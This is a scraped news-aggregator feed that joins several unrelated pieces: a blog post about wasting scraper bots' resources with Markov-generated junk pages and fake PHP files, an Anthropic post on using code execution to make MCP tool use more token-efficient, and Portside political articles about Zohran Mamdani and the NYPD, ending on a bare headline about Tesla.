Let me end with an analogy: coding agents are like the invention of the combustion engine. Spec-Driven Development keeps them confined to locomotives, when we should be building cars, planes, and everything in between. Oh, and just like combustion engines, we should use coding agents sparingly if we care about the environment.

Messing with Scraper Bots

Hacker News
herman.bearblog.dev
2025-11-15 07:38:18
Comments...
Original Article

As outlined in my previous two posts: scrapers are, inadvertently, DDoSing public websites. I've received a number of emails from people running small web services and blogs seeking advice on how to protect themselves.

This post isn't about that. This post is about fighting back.

When I published my last post, there was an interesting write-up doing the rounds about a guy who set up a Markov chain babbler to feed the scrapers endless streams of generated data. The idea here is that these crawlers are voracious, and if given a constant supply of junk data, they will continue consuming it forever, while (hopefully) not abusing your actual web server.

This is a pretty neat idea, so I dove down the rabbit hole and learnt about Markov chains, and even picked up Rust in the process. I ended up building my own babbler that could be trained on any text data, and would generate realistic looking content based on that data.
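The post doesn’t include the Rust code, but the core technique is simple enough to sketch. Below is a minimal word-level Markov chain babbler in TypeScript, offered purely as an illustration of the idea; the corpus file name and output length are placeholder choices, not the author’s implementation.

// markov.ts – illustrative sketch of a word-level Markov chain babbler (not the author's Rust code)
import { readFileSync } from 'node:fs';

type Chain = Map<string, string[]>;

// Record, for every word in the corpus, which words were observed to follow it.
function train(corpus: string): Chain {
  const words = corpus.split(/\s+/).filter(Boolean);
  const chain: Chain = new Map();
  for (let i = 0; i < words.length - 1; i++) {
    const followers = chain.get(words[i]) ?? [];
    followers.push(words[i + 1]);
    chain.set(words[i], followers);
  }
  return chain;
}

// Walk the chain from a random word, picking a random observed follower at each step.
function babble(chain: Chain, length: number): string {
  const keys = [...chain.keys()];
  let word = keys[Math.floor(Math.random() * keys.length)];
  const out: string[] = [word];
  for (let i = 1; i < length; i++) {
    const followers = chain.get(word);
    word = followers && followers.length > 0
      ? followers[Math.floor(Math.random() * followers.length)]
      : keys[Math.floor(Math.random() * keys.length)]; // dead end: restart at a random word
    out.push(word);
  }
  return out.join(' ');
}

// Train on any text dump (placeholder file name) and emit junk on demand.
const chain = train(readFileSync('corpus.txt', 'utf-8'));
console.log(babble(chain, 500));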

Now, the AI scrapers are actually not the worst of the bots. The real enemy, at least to me, is the bots that scrape with malicious intent. I get hundreds of thousands of requests for things like .env, .aws, and all the different .php paths that could potentially signal a misconfigured WordPress instance.

These people are the real baddies.

Generally I just block these requests with a 403 response. But since they want .php files, why don't I give them what they want?

I trained my Markov chain on a few hundred .php files, and set it to generate. The responses certainly look like php at a glance, but on closer inspection they're obviously fake. I set it up to run on an isolated project of mine, while incrementally increasing the size of the generated php files from 2kb to 10mb just to test the waters.

Here's a sample 1kb output:

<?php wp_list_bookmarks () directly, use the Settings API. Use this method directly. Instead, use `unzip_file() {
return substr($ delete, then click &#8220; %3 $ s object. ' ), ' $ image
*
*
*
* matches all IMG elements directly inside a settings error to the given context.
* @return array Updated sidebars widgets.
* @param string $ name = "rules" id = "wp-signup-generic-error" > ' . $errmsg_generic . ' </p> ';
	}
	/**
	 * Fires at the end of the new user account registration form.
	 *
	 * @since 3.0.0
	 *
	 * @param WP_Error $errors A WP_Error object containing ' user_name ' or ' user_email ' errors.
	 */
	do_action( ' signup_extra_fields ', $errors );
}

/**
 * Validates user sign-up name and email.
 *
 * @since MU (3.0.0)
 *
 * @return array Contains username, email, and error messages.
 *               See wpmu_validate_user_signup() for details.
 */
function validate_user_form() {
	return wpmu_validate_user_signup( $_POST[' user_name '], $_POST[' user_email '] );
}

/**
 * Shows a form for returning users to sign up for another site.
 *
 * @since MU (3.0.0)
 *
 * @param string          $blogname   The new site name
 * @param string          $blog_title The new site title.
 * @param WP_Error|string $errors     A WP_Error object containing existing errors. Defaults to empty string.
 */
function signup_another_blog( $blogname = ' ', $blog_title = ' ', $errors = ' ' ) {
	$current_user = wp_get_current_user();

	if ( ! is_wp_error( $errors ) ) {
		$errors = new WP_Error();
	}

	$signup_defaults = array(
		' blogname '   => $blogname,
		' blog_title ' => $blog_title,
		' errors '     => $errors,
	);
}

I had two goals here. The first was to waste as much of the bot's time and resources as possible, so the larger the file I could serve, the better. The second goal was to make it realistic enough that the actual human behind the scrape would take some time away from kicking puppies (or whatever they do for fun) to try figure out if there was an exploit to be had.

Unfortunately, an arms race of this kind is a battle of efficiency. If someone can scrape more efficiently than I can serve, then I lose. And while serving a 4kb bogus php file from the babbler was pretty efficient, as soon as I started serving 1mb files from my VPS the responses started hitting the hundreds of milliseconds and my server struggled under even moderate loads.

This led to another idea: what is the most efficient way to serve data? As a static site (or something similar).

So down another rabbit hole I went, writing an efficient garbage server. I started by loading the full text of the classic Frankenstein novel into an array in RAM where each paragraph is a node. Then on each request it selects a random index and the subsequent 4 paragraphs to display.

Each post would then have a link to 5 other "posts" at the bottom that all technically call the same endpoint, so I don't need an index of links. These 5 posts, when followed, quickly saturate most crawlers, since breadth-first crawling explodes, in this case by a factor of 5 per page.
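Herman doesn’t publish the server code, but the mechanism described above is easy to picture. Here is a rough TypeScript sketch under those assumptions; the file name, route, and port are mine, not his.

// babbler-server.ts – rough sketch of the in-memory "garbage server" described above
import { createServer } from 'node:http';
import { readFileSync } from 'node:fs';

// Load the novel once at startup; each paragraph becomes one node in the array.
const paragraphs = readFileSync('frankenstein.txt', 'utf-8')
  .split(/\r?\n\s*\r?\n/)
  .filter(p => p.trim().length > 0);

let served = 0; // in-memory request counter, reset on every deploy

createServer((_req, res) => {
  served++;
  // Pick a random starting paragraph and include the next four after it.
  const start = Math.floor(Math.random() * (paragraphs.length - 5));
  const body = paragraphs
    .slice(start, start + 5)
    .map(p => `<p>${p}</p>`)
    .join('\n');
  // Five links that all hit this same endpoint again, so breadth-first crawlers
  // fan out by a factor of five without needing any index of links.
  const links = Array.from({ length: 5 }, (_, i) =>
    `<a href="/babbler/${start}-${i}" rel="nofollow">another post</a>`
  ).join(' ');
  res.writeHead(200, { 'Content-Type': 'text/html' });
  res.end(`<html><head><meta name="robots" content="noindex,nofollow"></head>
<body>${body}<footer>${links}<p>${served} requests served</p></footer></body></html>`);
}).listen(8080);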

You can see it in action here: https://herm.app/babbler/

This is very efficient, and can serve endless posts of spooky content. The reason for choosing this specific novel is fourfold:

  1. I was working on this on Halloween.
  2. I hope it will make future LLMs sound slightly old-school and spoooooky.
  3. It's in the public domain, so no copyright issues.
  4. I find there are many parallels to be drawn between Dr Frankenstein's monster and AI.

I made sure to add noindex,nofollow attributes to all these pages, as well as in the links, since I only want to catch bots that break the rules. I've also added a counter at the bottom of each page that counts the number of requests served. It resets each time I deploy, since the counter is stored in memory, but I'm not connecting this to a database, and it works.

With this running, I did the same for php files, creating a static server that would serve a different (real) .php file from memory on request. You can see this running here: https://herm.app/babbler.php (or any path with .php in it).

There's a counter at the bottom of each of these pages as well.

As Maury said: "Garbage for the garbage king!"

Now with the fun out of the way, a word of caution. I don't have this running on any project I actually care about; https://herm.app is just a playground of mine where I experiment with small ideas. I originally intended to run this on a bunch of my actual projects, but while building this, reading threads, and learning about how scraper bots operate, I came to the conclusion that running this can be risky for your website. The main risk is that despite correctly using robots.txt, nofollow, and noindex rules, there's still a chance that Googlebot or other search engines' scrapers will scrape the wrong endpoint and determine you're spamming.

If you or your website depend on being indexed by Google, this may not be viable. It pains me to say it, but the gatekeepers of the internet are real, and you have to stay on their good side, or else. This doesn't just affect your search rankings, but could potentially add a warning to your site in Chrome, with the only recourse being a manual appeal.

However, this applies only to the post babbler. The php babbler is still fair game since Googlebot ignores non-HTML pages, and the only bots looking for php files are malicious.

So if you have a little web-project that is being needlessly abused by scrapers, these projects are fun! For the rest of you, probably stick with 403s.

What I've done as a compromise is add the following hidden link on my blog, and on another small project of mine, to tempt the bad scrapers:

<a href="https://herm.app/babbler/" rel="nofollow" style="display:none">Don't follow this link</a>

The only thing I'm worried about now is running out of Outbound Transfer budget on my VPS. If I get close I'll cache it with Cloudflare, at the expense of the counter.

This was a fun little project, even if there were a few dead ends. I know more about Markov chains and scraper bots, and had a great time learning, despite it being fuelled by righteous anger.

Not all threads need to lead somewhere pertinent. Sometimes we can just do things for fun.

Code execution with MCP: building more efficient AI agents

Lobsters
www.anthropic.com
2025-11-15 06:21:44
Comments...
Original Article

The Model Context Protocol (MCP) is an open standard for connecting AI agents to external systems. Connecting agents to tools and data traditionally requires a custom integration for each pairing, creating fragmentation and duplicated effort that makes it difficult to scale truly connected systems. MCP provides a universal protocol—developers implement MCP once in their agent and it unlocks an entire ecosystem of integrations.

Since launching MCP in November 2024, adoption has been rapid: the community has built thousands of MCP servers, SDKs are available for all major programming languages, and the industry has adopted MCP as the de-facto standard for connecting agents to tools and data.

Today developers routinely build agents with access to hundreds or thousands of tools across dozens of MCP servers. However, as the number of connected tools grows, loading all tool definitions upfront and passing intermediate results through the context window slows down agents and increases costs.

In this blog we'll explore how code execution can enable agents to interact with MCP servers more efficiently, handling more tools while using fewer tokens.

Excessive token consumption from tools makes agents less efficient

As MCP usage scales, there are two common patterns that can increase agent cost and latency:

  1. Tool definitions overload the context window;
  2. Intermediate tool results consume additional tokens.

1. Tool definitions overload the context window

Most MCP clients load all tool definitions upfront directly into context, exposing them to the model using a direct tool-calling syntax. These tool definitions might look like:

gdrive.getDocument
  Description: Retrieves a document from Google Drive
  Parameters:
    documentId (required, string): The ID of the document to retrieve
    fields (optional, string): Specific fields to return
  Returns: Document object with title, body content, metadata, permissions, etc.

salesforce.updateRecord
  Description: Updates a record in Salesforce
  Parameters:
    objectType (required, string): Type of Salesforce object (Lead, Contact, Account, etc.)
    recordId (required, string): The ID of the record to update
    data (required, object): Fields to update with their new values
  Returns: Updated record object with confirmation

Tool definitions like these occupy context window space, increasing response time and costs. In cases where agents are connected to thousands of tools, they’ll need to process hundreds of thousands of tokens before even reading a request.

2. Intermediate tool results consume additional tokens

Most MCP clients allow models to directly call MCP tools. For example, you might ask your agent: "Download my meeting transcript from Google Drive and attach it to the Salesforce lead."

The model will make calls like:

TOOL CALL: gdrive.getDocument(documentId: "abc123")
        → returns "Discussed Q4 goals...\n[full transcript text]"
           (loaded into model context)

TOOL CALL: salesforce.updateRecord(
			objectType: "SalesMeeting",
			recordId: "00Q5f000001abcXYZ",
  			data: { "Notes": "Discussed Q4 goals...\n[full transcript text written out]" }
		)
		(model needs to write entire transcript into context again)

Every intermediate result must pass through the model. In this example, the full call transcript flows through twice. For a 2-hour sales meeting, that could mean processing an additional 50,000 tokens. Even larger documents may exceed context window limits, breaking the workflow.

With large documents or complex data structures, models may be more likely to make mistakes when copying data between tool calls.

The MCP client loads tool definitions into the model's context window and orchestrates a message loop where each tool call and result passes through the model between operations.

Code execution with MCP improves context efficiency

With code execution environments becoming more common for agents, a solution is to present MCP servers as code APIs rather than direct tool calls. The agent can then write code to interact with MCP servers. This approach addresses both challenges: agents can load only the tools they need and process data in the execution environment before passing results back to the model.

There are a number of ways to do this. One approach is to generate a file tree of all available tools from connected MCP servers. Here's an implementation using TypeScript:

servers
├── google-drive
│   ├── getDocument.ts
│   ├── ... (other tools)
│   └── index.ts
├── salesforce
│   ├── updateRecord.ts
│   ├── ... (other tools)
│   └── index.ts
└── ... (other servers)

Then each tool corresponds to a file, something like:

// ./servers/google-drive/getDocument.ts
import { callMCPTool } from "../../../client.js";

interface GetDocumentInput {
  documentId: string;
}

interface GetDocumentResponse {
  content: string;
}

/* Read a document from Google Drive */
export async function getDocument(input: GetDocumentInput): Promise<GetDocumentResponse> {
  return callMCPTool<GetDocumentResponse>('google_drive__get_document', input);
}

Our Google Drive to Salesforce example above becomes the code:

// Read transcript from Google Docs and add to Salesforce prospect
import * as gdrive from './servers/google-drive';
import * as salesforce from './servers/salesforce';

const transcript = (await gdrive.getDocument({ documentId: 'abc123' })).content;
await salesforce.updateRecord({
  objectType: 'SalesMeeting',
  recordId: '00Q5f000001abcXYZ',
  data: { Notes: transcript }
});

The agent discovers tools by exploring the filesystem: listing the ./servers/ directory to find available servers (like google-drive and salesforce), then reading the specific tool files it needs (like getDocument.ts and updateRecord.ts) to understand each tool's interface. This lets the agent load only the definitions it needs for the current task. This reduces the token usage from 150,000 tokens to 2,000 tokens—a time and cost saving of 98.7%.

Cloudflare published similar findings, referring to code execution with MCP as “Code Mode." The core insight is the same: LLMs are adept at writing code and developers should take advantage of this strength to build agents that interact with MCP servers more efficiently.

Benefits of code execution with MCP

Code execution with MCP enables agents to use context more efficiently by loading tools on demand, filtering data before it reaches the model, and executing complex logic in a single step. There are also security and state management benefits to using this approach.

Progressive disclosure

Models are great at navigating filesystems. Presenting tools as code on a filesystem allows models to read tool definitions on-demand, rather than reading them all up-front.

Alternatively, a search_tools tool can be added to the server to find relevant definitions. For example, when working with the hypothetical Salesforce server used above, the agent searches for "salesforce" and loads only those tools that it needs for the current task. Including a detail level parameter in the search_tools tool that allows the agent to select the level of detail required (such as name only, name and description, or the full definition with schemas) also helps the agent conserve context and find tools efficiently.
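The post doesn’t specify an interface for such a tool; as a rough sketch of what the wrapper might look like (names, fields, and the relative import path are illustrative, not part of MCP):

// ./servers/searchTools.ts – illustrative sketch of an on-demand tool discovery helper
import { callMCPTool } from '../client.js';

type DetailLevel = 'name' | 'name_and_description' | 'full';

interface SearchToolsInput {
  query: string;         // e.g. "salesforce"
  detail?: DetailLevel;  // how much of each matching definition to return
}

interface SearchToolsResult {
  tools: Array<{
    name: string;
    description?: string;   // present for 'name_and_description' and 'full'
    inputSchema?: object;   // present only for 'full'
  }>;
}

/* Search available MCP tools without loading every definition into context */
export async function searchTools(input: SearchToolsInput): Promise<SearchToolsResult> {
  return callMCPTool<SearchToolsResult>('search_tools', input);
}

// The agent might first ask for names only, then fetch full schemas for the
// handful of tools it actually plans to call:
// const hits = await searchTools({ query: 'salesforce', detail: 'name' });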

Context efficient tool results

When working with large datasets, agents can filter and transform results in code before returning them. Consider fetching a 10,000-row spreadsheet:

// Without code execution - all rows flow through context
TOOL CALL: gdrive.getSheet(sheetId: 'abc123')
        → returns 10,000 rows in context to filter manually

// With code execution - filter in the execution environment
const allRows = await gdrive.getSheet({ sheetId: 'abc123' });
const pendingOrders = allRows.filter(row => 
  row["Status"] === 'pending'
);
console.log(`Found ${pendingOrders.length} pending orders`);
console.log(pendingOrders.slice(0, 5)); // Only log first 5 for review

The agent sees five rows instead of 10,000. Similar patterns work for aggregations, joins across multiple data sources, or extracting specific fields—all without bloating the context window.

More powerful and context-efficient control flow

Loops, conditionals, and error handling can be done with familiar code patterns rather than chaining individual tool calls. For example, if the agent needs to wait for a deployment notification in Slack, it can write:

let found = false;
while (!found) {
  const messages = await slack.getChannelHistory({ channel: 'C123456' });
  found = messages.some(m => m.text.includes('deployment complete'));
  if (!found) await new Promise(r => setTimeout(r, 5000));
}
console.log('Deployment notification received');

This approach is more efficient than alternating between MCP tool calls and sleep commands through the agent loop.

Additionally, being able to write out a conditional tree that gets executed also saves on “time to first token” latency: rather than having to wait for a model to evaluate an if-statement, the agent can let the code execution environment do this.
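As an illustration (reusing the hypothetical Salesforce wrapper from earlier in the post), a branch like the following runs entirely inside the execution environment; the model never has to read the query result to decide which call comes next:

// The whole decision tree executes in the sandbox; the model only sees the final log line.
const leads = await salesforce.query({
  query: "SELECT Id, Status FROM Lead WHERE Email = 'jane@example.com' LIMIT 1"
});

if (leads.length === 0) {
  console.log('No matching lead found');
} else if (leads[0].Status === 'Closed') {
  console.log('Lead already closed; nothing to do');
} else {
  await salesforce.updateRecord({
    objectType: 'Lead',
    recordId: leads[0].Id,
    data: { Status: 'Contacted' }
  });
  console.log('Updated lead to Contacted');
}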

Privacy-preserving operations

When agents use code execution with MCP, intermediate results stay in the execution environment by default. This way, the agent only sees what you explicitly log or return, meaning data you don’t wish to share with the model can flow through your workflow without ever entering the model's context.

For even more sensitive workloads, the agent harness can tokenize sensitive data automatically. For example, imagine you need to import customer contact details from a spreadsheet into Salesforce. The agent writes:

const sheet = await gdrive.getSheet({ sheetId: 'abc123' });
for (const row of sheet.rows) {
  await salesforce.updateRecord({
    objectType: 'Lead',
    recordId: row.salesforceId,
    data: { 
      Email: row.email,
      Phone: row.phone,
      Name: row.name
    }
  });
}
console.log(`Updated ${sheet.rows.length} leads`);

The MCP client intercepts the data and tokenizes PII before it reaches the model:

// What the agent would see, if it logged the sheet.rows:
[
  { salesforceId: '00Q...', email: '[EMAIL_1]', phone: '[PHONE_1]', name: '[NAME_1]' },
  { salesforceId: '00Q...', email: '[EMAIL_2]', phone: '[PHONE_2]', name: '[NAME_2]' },
  ...
]

Then, when the data is shared in another MCP tool call, it is untokenized via a lookup in the MCP client. The real email addresses, phone numbers, and names flow from Google Sheets to Salesforce, but never through the model. This prevents the agent from accidentally logging or processing sensitive data. You can also use this to define deterministic security rules, choosing where data can flow to and from.
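The post doesn’t show the harness side of this, but conceptually the MCP client only needs a reversible lookup table. A minimal sketch of the idea (not an MCP API, just an illustration):

// Sketch of a tokenization layer an MCP client might maintain around tool calls.
const tokenToValue = new Map<string, string>();
let counter = 0;

// Applied to tool results before they are shown to the model.
function tokenize(value: string, kind: 'EMAIL' | 'PHONE' | 'NAME'): string {
  const token = `[${kind}_${++counter}]`;
  tokenToValue.set(token, value);
  return token;
}

// Applied to outgoing tool-call arguments produced by the agent's code,
// restoring real values before they reach the downstream MCP server.
function detokenize(text: string): string {
  return text.replace(/\[(?:EMAIL|PHONE|NAME)_\d+\]/g, m => tokenToValue.get(m) ?? m);
}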

State persistence and skills

Code execution with filesystem access allows agents to maintain state across operations. Agents can write intermediate results to files, enabling them to resume work and track progress:

const leads = await salesforce.query({ 
  query: 'SELECT Id, Email FROM Lead LIMIT 1000' 
});
const csvData = leads.map(l => `${l.Id},${l.Email}`).join('\n');
await fs.writeFile('./workspace/leads.csv', csvData);

// Later execution picks up where it left off
const saved = await fs.readFile('./workspace/leads.csv', 'utf-8');

Agents can also persist their own code as reusable functions. Once an agent develops working code for a task, it can save that implementation for future use:

// In ./skills/save-sheet-as-csv.ts
import * as gdrive from './servers/google-drive';
export async function saveSheetAsCsv(sheetId: string) {
  const data = await gdrive.getSheet({ sheetId });
  const csv = data.map(row => row.join(',')).join('\n');
  await fs.writeFile(`./workspace/sheet-${sheetId}.csv`, csv);
  return `./workspace/sheet-${sheetId}.csv`;
}

// Later, in any agent execution:
import { saveSheetAsCsv } from './skills/save-sheet-as-csv';
const csvPath = await saveSheetAsCsv('abc123');

This ties in closely to the concept of Skills, folders of reusable instructions, scripts, and resources for models to improve performance on specialized tasks. Adding a SKILL.md file to these saved functions creates a structured skill that models can reference and use. Over time, this allows your agent to build a toolbox of higher-level capabilities, evolving the scaffolding that it needs to work most effectively.

Note that code execution introduces its own complexity. Running agent-generated code requires a secure execution environment with appropriate sandboxing, resource limits, and monitoring. These infrastructure requirements add operational overhead and security considerations that direct tool calls avoid. The benefits of code execution—reduced token costs, lower latency, and improved tool composition—should be weighed against these implementation costs.

Summary

MCP provides a foundational protocol for agents to connect to many tools and systems. However, once too many servers are connected, tool definitions and results can consume excessive tokens, reducing agent efficiency.

Although many of the problems here feel novel—context management, tool composition, state persistence—they have known solutions from software engineering. Code execution applies these established patterns to agents, letting them use familiar programming constructs to interact with MCP servers more efficiently. If you implement this approach, we encourage you to share your findings with the MCP community.

Acknowledgments

This article was written by Adam Jones and Conor Kelly. Thanks to Jeremy Fox, Jerome Swannack, Stuart Ritchie, Molly Vorwerck, Matt Samuels, and Maggie Vo for feedback on drafts of this post.

Friday Nite Videos | November 14, 2025

Portside
portside.org
2025-11-15 03:49:37
Friday Nite Videos | November 14, 2025 barry Fri, 11/14/2025 - 22:49 ...
Original Article

Friday Nite Videos | November 14, 2025

Trump Faces Mass Defections Over Epstein Files. The Assignment Is To Fight Fascism | AOC. Trump Gets Epstein-Busted; Ghislaine Gets VIP Treatment. Elmo and Cookie Monster Crash Netflix Auditions | Sesame Street. Is Our Universe Inside a Black Hole?

Portside

For Mamdani To Beat the NYPD, the Left Must Build Power

Portside
portside.org
2025-11-15 03:24:59
For Mamdani To Beat the NYPD, the Left Must Build Power barry Fri, 11/14/2025 - 22:24 ...
Original Article

In cities across America, a new generation of left-wing mayors is confronting the same dilemma: What do you do when you inherit institutions designed to crush left movements like those that carried you into office? Socialist campaigns promise to challenge the power of capital, but upon taking office, left executives find themselves constrained by police unions, business interests, and state politicians eager to appear tough on crime. Does anyone have a good plan to push back?

In New York City, we’re about to find out—starting with the cops.

In the run-up to his election as mayor, Zohran Mamdani said he would keep Jessica Tisch—a billionaire heiress who has rolled back police reforms and collaborated with ICE—as NYPD commissioner. He repeated that pledge after his victory last week. Five years ago, Mamdani called the NYPD “racist, anti-queer,” “wicked,” and “corrupt.” After being forced to apologize for these comments, and pledging his support for the police, he’s now saying that he and Tisch can work together. This decision has drawn criticism from Mamdani’s supporters, and leftists have good reason to be concerned about Tisch’s record. Yet instead of viewing this as a betrayal, we should think of it as proof of how much power police have in local politics—and how little power the left holds.

Business elites demand aggressive policing because it establishes what they see as proper order, a prerequisite for commercial investment. To quote former NYPD Commissioner Bill Bratton, police “flush” homeless and other ostensibly disposable people “off the street” to fuel development and displacement. The ultra-rich aren’t being subtle about this. “Public safety is the number one fiscal stimulus,” one hedge fundie told Bloomberg just after Mamdani’s election.

The playbook is national. In San Francisco, Big Tech and real estate money toppled reform DA Chesa Boudin; in Minneapolis, defunding efforts were defeated in part by business and police union advocacy (though the full story is more complex). The message travels: Undermine police power, and capital will move to punish you—at the ballot box, in the press, and through state preemption.

Because Mamdani’s campaign is now the test case for progressive governance, how he manages the NYPD will have enormous consequences for left organizing across the country. But ultimately, what happens will be less down to Mamdani’s choices than to ours. Without movements strong enough to either pressure or protect them, any left politician is bound to yield to these interests—and Mamdani is no different. We won’t be able to push Mamdani, or anyone else, to undermine police power unless we become a force to be reckoned with.

Who is Jessica Tisch, anyway? An heiress of the Loews Corporation, Tisch entered public service in 2008, working within the NYPD intelligence division that helped build a vast surveillance network targeting Muslims. Adams tapped her as commissioner in late 2024 after his earlier picks fell afoul of federal corruption probes. Tisch rooted out some cronyism in the department, and she has taken credit for subsequent declines in shootings, though New York may only be following a nationwide trend.

But Tisch has also practiced a firmly old-guard version of policing in ways that underscore just how strange a bedfellow she is set to be with Mamdani: adopting Bill Bratton’s broken windows policing practices, defending the city’s racist gang database, overseeing a training that labels the keffiyeh antisemitic, and collaborating with ICE to crush pro-Palestine protests. Against the available evidence, she blamed modest steps like bail reform and Raise the Age for post-pandemic crime spikes. She is also a staunch Zionist who has defended the NYPD’s brutal policing of Palestine protests, whereas Mamdani is an advocate for Palestinian liberation. And Tisch’s family members spent over a million dollars opposing Mamdani’s election.

So what explains their fragile alliance? In a word: power.

After Mamdani won the Democratic primary, the richest New Yorkers threw tantrums and lit money on fire. When Mamdani set out to assuage their fears, the scions of capital settled on one demand: Keep Tisch in her job. Adding to the pressure, Democratic party leaders initially stayed silent. Figures from Kathy Hochul to Hakeem Jeffries reportedly conditioned their endorsements on keeping Tisch. Faced with this onslaught, Mamdani yielded. If he wanted to turn his upstart campaign into a bona fide Democratic coalition, it seemed, he had no other choice.

Fulfilling their end of the Faustian bargain, Hochul awkwardly yet earnestly joined Mamdani at campaign rallies, and Kathy Wylde, one of the local ruling class’s most influential power brokers, began saying that perhaps all sides could find a way to work together. Now we will all see whether that’s true.

How should leftists interpret these developments? Writing in The Nation last July, writer and policing expert Alex Vitale discouraged Mamdani from keeping Tisch, arguing that she would “never truly ally with him.” After Mamdani confirmed that he wanted to keep Tisch, journalist Ken Klippenstein said Mamdani had chosen a “straitjacket,” while Spencer Ackerman called the decision a “big mistake,” noting that “Tisch cooperated with ICE to lock up Leqaa Kordia.”

I also do not see Mamdani and Tisch as natural allies, and I agree that Tisch’s collaboration with ICE was repugnant. Yet there is a clear explanation for Mamdani’s decision: There was no organized opposition. There wasn’t even a rumored alternative to Tisch, let alone a concerted campaign to propose one.

The left doesn’t build talent pipelines for police brass, and I’m not arguing that we should start. We want to reduce police resources, staffing, and technology. Yet our inaction meant Mamdani saw no constituency for another choice.

More broadly, the left has yet to recover from the backlash against the George Floyd uprising, and any honest observer would admit that regaining the momentum that crested in 2020 will require quite a bit of organizing. The consequence of all of this is that there was no significant counterweight to the immense forces urging Mamdani to stick with Tisch—and to repudiate his former stances on policing. Is it any wonder that he gave way?

The core battle over Tisch—and the political necessity of conceding, at least in part, to police power—appears to have been lost. But that doesn’t mean there is nothing the left can do. Instead of expending energy on battles we already decided not to fight, we should scrutinize what Mamdani’s NYPD does differently in 2026. We must ensure that Mamdani stays true to the promises he made: abolishing the Strategic Response Group (SRG), cutting overtime spending, and creating a Department of Community Safety. (SRG’s top officer filed for retirement the day after Mamdani won.)

Mamdani apparently recognizes that Tisch is a savvy politician. Her mentor and former top cop Bill Bratton describes himself as a political broker—it’s part of the job description. But Mamdani has political skills of his own. When Hell Gate asked Mamdani how he reconciled Tisch’s agenda with his own, his response was wry: “I think everyone will follow my lead—I’ll be the mayor.” Time will tell whether he can stay three steps ahead of Tisch and her backers.

The first major hurdle for this relationship may come alongside any major Palestine-related action in 2026. Mamdani’s support base overlaps with Palestine activists—he started a Students for Justice in Palestine chapter in college—so it’s hard to imagine that he would be enthusiastic about police cracking student skulls or swarming Bay Ridge, as they did under Eric Adams. At the same time, Tisch is committed to brutal protest policing. Mamdani’s coalition will be severely, perhaps fatally, damaged if he winds up overseeing that kind of assault. He’s already working on an alternative protest-policing approach, but implementing it will be an early, defining test.

One constituency was remarkably quiet amid the battle to control the NYPD: the NYPD’s largest union, the Police Benevolent Association (PBA). The PBA endorsed no one in the mayoral race and stayed silent on Tisch. Given the PBA’s outsize influence on New York politics, its silence is deafening—and cannot be expected to last long.

How might we expect the PBA to greet its new Muslim socialist boss? Its relationship with New York’s first Black and democratic socialist mayor provides some clues. David Dinkins clashed with the PBA over his proposal to make the Civilian Complaint Review Board an independent, civilian-controlled agency. In 1992, the PBA organized an opposition rally of thousands of cops that devolved into a drunken riot , complete with cops shouting slurs and storming City Hall.

Bill de Blasio, whose campaign emphasized police reform more than Mamdani’s, also fought the police unions (and lost). Cops turned their backs on de Blasio and walked off the job—a classic police tactic, given that work slowdowns generate headlines reinforcing the myth that police pullbacks endanger residents. The nadir of the relationship between the police and de Blasio came during the 2020 protests, when a police union gleefully posted a report of Chiara de Blasio’s arrest—an incident likely on Mamdani’s mind, as he hired additional security after Islamophobic threats.

The battle over Tisch may not be a primary focus for police unions (though the Sergeants Benevolent Association thinks Tisch should stay). The only major play that the unions have made so far is forcing Mamdani to apologize for calling them racist—hardly a controversial claim, as Eric Adams famously founded an organization drawing attention to the issue, but one Mamdani walked back nonetheless.

On the one hand, perhaps police see Mamdani’s modest reform promises as tolerable. On the other hand, perhaps they are waiting for an opportune moment to press for what they always want: more money and less accountability.

Could the proposed Department of Community Safety cause a fight over city resources? Mamdani often notes that police are stuck with work they don’t want, like mental-health crisis response. But across the country, police fight to maintain their professional authority. In Baltimore , violence interrupters work to stop retaliatory violence. Because they won’t share real-time street information with cops, relations are tense. Police view interrupters as criminals, and interrupters feel that they have become targets of police sabotage. If the new department competes for dollars, expect police backlash—the NYPD arrested two interrupters last year.

Maybe Mamdani keeps Tisch and compels her to carry out reforms; maybe she storms off and the press calls it a crisis. Either way, what happens next will measure the left’s real strength.

If she walks, organizers should move to block any consensus around a status-quo safety agenda. The task will be to give Mamdani political cover to appoint a commissioner actually willing to implement his program.

If she stays and complies, we should be ready to push for more ambitious demands: reduced NYPD technology and surveillance capacity, the end of the gang database and status-quo approaches to gang policing , and budget and headcount reductions. We are in the unfortunate position of needing to organize like hell just to claw back the status quo we enjoyed in 2019—the city jail population nearly doubled under Adams.

In either scenario, we will need to become stronger. The defund movement in NYC was ruthlessly crushed and co-opted —this is part of why the billionaires are able to choose what happens with the NYPD.

Organizers focused on criminalization may need to engage in electoral work more often. Mamdani is ostensibly accountable to NYC-DSA, for example. Mamdani’s allies have also created a nonprofit to continue the momentum of his campaign, which is focused on affordability—but has made no mention of organizing around safety. There may be a case for joining such organizations to push internal decision-making to address policing and incarceration.

Labor action is another important tactic. Across the country, police and corrections officers use wildcat strikes to resist accountability and retaliate against criminalized people. Strikes work! Aligning labor with anti-police organizing magnifies leverage. Twentieth-century movements succeeded by disrupting capital to force politicians’ hands . The New Deal and the Civil Rights Act were the result of militant, disruptive mass action. Effective tactics may seem uncivil or illegitimate—that’s too bad for the respectability police.

Organizing efforts could dovetail with Mamdani’s agenda. The Department of Community Safety will demonstrate the potential of non-police approaches. That said, the administration’s ability to move towards abolitionist horizons depends on our power.

In an ideal world, Mamdani’s coalition would be so robust that we could insulate him from the fallout of calling the NYPD’s bluff when it walks off the job—or firing Tisch if she refuses to budge on more ambitious steps. Indeed, throwing Tisch under the bus at an opportune moment could be a great play to undermine the prospects of a potential threat in the next election.

What we learn from the billionaires’ insistence on Tisch is that, while they’ll merely grumble about a leftist agenda on the cost of living—and, potentially, higher taxes—they are not prepared to brook dissent on the running of the policing machine. This is true in every city where progressives are gaining power. To build a government that serves working people, police power must be challenged. Winning the election was an accomplishment, but the NYPD didn’t even see it as a fight worth joining. That means the real battle still lies ahead.

Now is the time to find a political home for that battle. Everyone has skills that can contribute to the cause. Perhaps it’s taking notes in union meetings, signing up for ICE-watch training, or phonebanking to keep voters engaged. Even one small task matters.

Mamdani can’t beat the NYPD alone. No politician can. The only way to break the cops’ choke hold on city politics is to become stronger than them. Tisch’s tenure should remind us what’s at stake: Until the left can build and sustain real power in the streets, the billionaires will keep theirs in City Hall.

Jonathan Ben-Menachem is a PhD candidate in sociology at Columbia University, where he researches the politics of criminalization and crime journalism.

The Fake $1 Trillion Nail in Tesla’s Coffin

Portside
portside.org
2025-11-15 02:50:15
The Fake $1 Trillion Nail in Tesla’s Coffin barry Fri, 11/14/2025 - 21:50 ...
Original Article

